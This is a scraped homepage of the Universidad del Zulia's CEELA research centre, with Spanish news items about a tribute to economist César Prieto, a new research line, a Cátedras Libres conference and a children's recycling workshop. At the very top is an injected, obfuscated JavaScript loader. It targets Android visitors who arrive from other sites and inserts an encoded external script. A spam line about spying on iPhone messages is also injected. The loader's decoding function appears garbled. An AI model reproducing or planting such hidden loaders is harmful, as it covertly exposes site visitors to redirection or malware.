;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Inicio - Centro Experimental de Estudios Latinoamericanos <br /> 'Dr. Gastón Parra Luzardo' spy on messages from iphone 6s spy see more visit web page article source
Universidad del Zulia
Correo LUZMapa del sitio
20 de octubre de 2018
 
Mas del CEELA
Descargas
Eventos
Documentos
Enlaces
 
 
  images/stories/botones/boton-directorio.jpg  
  images/stories/botones/boton-bonus.jpg  
  /images/stories/botones/boton-nomina.jpg  

Agrandar texto   Reducir texto   Reestablecer texto    
Inicio
HOMENAJE A CESAR PRIETO Imprimir Correo

Megdy Alvarado / prensa CEELA

El Centro Experimental de Estudios Latinoamericano Dr. Gastón Parra CEELA, Unidad estratégica adscrita al vicerrectorado Académico de La Universidad del Zulia, el Centro Socio económico del Petróleo y Energías Alternativas (Cespe) y la Academia de Ciencias Económicas del Estado Zulia (ACEEZ).
 

Invitan: Homenaje al Economista Cesar Prieto Oberto, " Aporte a las Ciencias Económicas, Estudios petroleros y Deporte.
 

Fecha: Viernes 27/04/2018.
Hora: 8:30 am
Lugar: Biblioteca del CEELA.

 

Nueva línea de investigación tiene el Ceela Imprimir Correo

Desarrollo, Políticas Públicas y Globalización en América Latina y El Caribe

Texto: Megdy Alvarado / Prensa CEELA

 

En sesión ordinaria el Consejo Técnico del Centro Experimental de Estudios Latinoamericanos “Dr. Gastón Parra Luzardo”, unidad estratégica adscrita al Vicerrectorado Académico de la Universidad del Zulia, se aprobó la creación de una nueva línea de investigación que lleva por nombre Desarrollo, Políticas Públicas y Globalización en América Latina y El Caribe, con la cual se busca generar saberes integrales.


Así lo dio a conocer Nebis Acosta, directora del Ceela, quien resaltó que la idea es  diversificar las áreas del conocimiento, contribuir a la formación de nuevos investigadores y apoyar a las instituciones públicas en el desarrollo socioeconómico en América Latina y el Caribe, además porque con ella, se abre el abanico de opciones para que los investigadores de la Universidad del Zulia así como externos, puedan adscribir sus proyectos en estas áreas del saber, bajo la categoría de investigadores especiales. 


Igualmente se conoció que también fueron aprobados los proyectos de titulados: Democracia, Perfectibilidad y Desarrollo ¿Una alternativa para Venezuela?, Pensamiento Económico sobre el Desarrollo en América Latina y el Caribe: Un análisis de sus principales corrientes y Política de Innovación para el Desarrollo y la Investigación de América Latina y El Caribe. Caso de Estudio: Venezuela. Período 1999-2015. 


Finalmente, quedó designada Elita Rincón, como coordinadora de la Cátedra Libre América Latina y el Caribe. 

Cátedras Libres y el CEELA realizarán el I Encuentro Latinoamericano Imprimir Correo

Megdy Alvarado / Prensa CEELA
José E. Millán / Prensa LUZ VAC

El Vicerrectorado Académico de la Universidad del Zulia (LUZ) a través de su programa estratégico Cátedras Libres de LUZ y su unidad estratégica el Centro Experimental de Estudios Latinoamericanos "Dr. Gastón Parra Luzardo" (CEELA), invitan a participar del I Encuentro Latinoamericano, I Encuentro Nacional y el VI Seminario Universitario de Cátedras Libres "Dra. Imelda Rincón Finol".

El evento se realizará los días 28 y 29 de noviembre en la Nueva Sede Rectoral de LUZ y en la Sede de la División de Estudios para Graduados de la Facultad de Humanidades y Educación (FHE) de LUZ .
 

La actividad que lleva por eslogan "desafíos y retos en la innovación académica", pretende discernir sobre la necesidad de establecer redes para continuar avanzando académicamente y científicamente, bajo los diversos esquemas de investigación y cuyos resultados merecen ser conocidos más allá de nuestras fronteras.
 

Diversas personalidades se darán cita en los foros preparados para tal fin, entre los que destacan: la Dra. Teresa Álvarez, del Observatorio Nacional de Responsabilidad Social Universitaria; el Dr. Hugo Quintero de SedLUZ ; el Abog. Ernesto Quintanillo, miembro de la Corporación Universitaria del Caribe (CECAR), Colombia; MSc. Gabriela Navarro, LUZ; Dr. Rafael Espinoza, LUZ.

Las mesas de trabajo serán distribuidas por áreas de conocimiento: dinámica gerencial de las Cátedras Libres; interconexión nacional e internacional del sector universitario con el Estado, la sociedad y la comunidad; vinculación interinstitucional para la activación del sector productivo nacional; desafíos tecnológicos y la innovación académica; enfoques innovadores en el área bio-psicosocial para el desarrollo integral humano; aportes al entorno socio-ambiental para el desarrollo sustentable y por último, baluartes humanos expresiones culturales.

Para este evento se designó a la Dra. Imelda Rincón Finol como Madrina Epónima por que en la década de los años 90, en su condición de Vicerrectora Académica y Rectora de LUZ, logró la legitimación de las funciones de las Cátedras Libres y, por ende, el impulso de las mismas, como continuidad de lo expuesto por Lossada en 1946 a su primer año de Rector de LUZ: "la Universidad del Zulia quiere salirse de sus muros y desbordar sobre el pueblo su acción cultural. De allí la creación de su Revista, de las Cátedras Libres de Idiomas, de Radiotecnia, de Química del petróleo, y su interés por las actividades literarias y artísticas." (Obras Selectas del Dr. Jesús Enrique Lossada, 1992:332). Hoy día, existen 48 Cátedras Libres adscritas al Vicerrectorado Académico

 

Las Cátedras Libres de LUZ buscan la internacionalización Imprimir Correo

Texto:José E. Millán / Prensa LUZ VAC

Megdy Alvarado / Prensa CEELA

Fotos: José E. Millán / Prensa LUZ VAC

El pasado 28 y 29 de noviembre, se realizó el I Encuentro Latinoamericano de las Cátedras Libres, I Encuentro Nacional y IV Seminario "Dra. Imelda Rincón Finol",  evento organizado por la Coordinación Central de Cátedras Libres y el Centro Experimental de Estudios Latinoamericanos "Dr. Gastón Parra Luzardo" (CEELA),  en el marco de los 71 años y 35 años de fundación respectivamente, unidades estratégicas adscritas al Vicerrectorado Académico de LUZ.

La actividad se efectuó en el Salón Académico "Dr.  Leonardo Atencio Finol" (Salón VIP),  ubicado en la Sede Rectoral.

  

La realización de esta reunión de intercambio de saberes y experiencias logró reunir 120 participantes de distintos ámbitos de acción. También se desarrollaron 2 importantes foros: “Cátedras Libres: Retos y Desafíos de la Innovación Académica” y “Conformación de la red de Cátedras Libres: Cultura, Organización e Institucionalización”

Se presentaron  43 ponencias agrupadas en 7 ejes temáticos y 4 mesas de trabajo, a saber: dinámica gerencial de las Cátedras Libres; interconexión nacional e internacional del sector Universitario con el estado, la sociedad y la comunidad desde las Cátedras Libres; vinculación de las Cátedras Libres para la activación del sector productivo nacional; las Cátedras Libres ante los desafíos tecnológicos y la innovación académica ; enfoques bio-psico-social de las Cátedras Libres; aportes de las Cátedras Libres al entorno socio-ambiental y baluartes humanos y expresiones culturales.

La madrina epónima y ex rectora de LUZ, Dra. Imelda Rincón Finol, agradeció el homenaje que le realizaron y aprovechó la ocasión para anunciar que en el año 2018 se conmemorará el Centenario de la Reforma Universitaria de Córdoba, cuyos principios dio origen a la autonomía universitaria, el cogobierno, la extensión universitaria la periodicidad de las cátedras y los concursos de oposición.

Por su parte la vicerrectora académica de LUZ, Dra. Judith Aular de Durán, felicitó a a la coordinadora central de Cátedras Libres, Dra. Sheila Ortega y a todo el comité organizador de este encuentro y señaló que “la gran mayoría de nuestras cátedras abordan contenidos de profunda huella social, este encuentro ha permitido ampliar los horizontes que permitan sustentar a las Cátedras Libres por medio de las oportunidades de financiamiento que brindan los organismos nacionales e internacionales”.

La clausura del evento estuvo amenizada por el profesor Víctor Hugo Márquez, coordinador de la Catedra Libre de Gaita Zuliana y el grupo gaitero “Somos LUZ de la gaita”, quienes presentaron al público asistente los diferentes géneros del ritmo tradicional del estado.  

2do taller de reciclaje realizado en el Colegio Maria Luisa Lossada Imprimir Correo

Megdy Alvarado / Prensa CEELA

 

Edición amor y amistad, fue el tema del 2do taller de reciclaje realizado en el Colegio Maria Luisa Lossada

 

Como parte del programa de formación y de labores de extensión, el Centro Experimental de Estudios Latinoamericanos "Dr. Gastón Parra Luzardo", unidad estratégica adscrita al Vicerrectorado Académico de LUZ, realizó en la U.E. Colegio Maria Luisa Lossada, por segundo año consecutivo, el taller de reciclaje para niños, edición dedicada al amor y la amistad.images/stories/noticias/dsc_0018.jpg

 

En esta oportunidad las facilitadoras Dalia Plata de Plata y Mariaviginia Franco trabajaron con los niños de 4to, 5to y 6to grado, ejecutando en cada sala proyectos distintos para celebrar el día de San Valentín, partiendo del uso de materiales de desecho, enseñándoles a los niños, futuro del país, la importancia de aprovechar los recursos que tenemos para construir nuevos objetos y contribuir así a minimizar los niveles de contaminación, para tener un planeta cada vez más verde, más limpio y sano.


Nebis Acosta Kánquis, directora del Ceela, manifestó en nombre de su equipo de trabajo, la satisfacción por el trabajo realizado, puesto que el interactuar con los niños fue una experiencia de tres maravillosos días que quedaron demostrados por la alegría y entusiasmo demostrado por los alumnos y personal docente del plantel, a quienes agradezco particularmente su apoyo mediante cooperación.

 




^ Subir